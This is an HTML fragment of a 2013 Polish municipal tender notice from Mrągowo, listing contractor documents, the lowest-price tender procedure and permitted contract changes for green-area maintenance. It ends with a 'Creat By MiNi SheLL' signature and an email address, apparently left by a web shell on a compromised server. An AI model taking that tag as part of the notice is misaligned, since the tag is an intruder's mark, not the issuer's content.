<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
1. Wynagrodzenie Wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
- zmiana stawki urzędowej podatku VAT,
- rezygnacji z części prac, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy - o wartość niewykonanych prac.
- zmiany powierzchni terenów zieleni objętych utrzymaniem.
2. Inne zmiany:
a) w zakresie kluczowego personelu Wykonawcy, za uprzednią zgodą Zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze,
b) w zakresie podwykonawstwa za uprzednią zgodą Zamawiającego:
- powierzenie podwykonawcom innej części prac niż wskazana w ofercie Wykonawcy,
- zmiana podwykonawcy.
3. Warunki zmian:
- inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
- uzasadnienie zmian - prawidłowa realizacji przedmiotu umowy, obniżenie kosztów.
    - forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/mragowo_gmina_miejska/zamowienia_publiczne/110/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mrągowie, ul. Królewiecka 60A, 11-700 Mrągowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2013 godzina 10:30, miejsce: Urząd Miejski w Mrągowie, ul. Królewiecka 60A, 11-700 Mrągowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com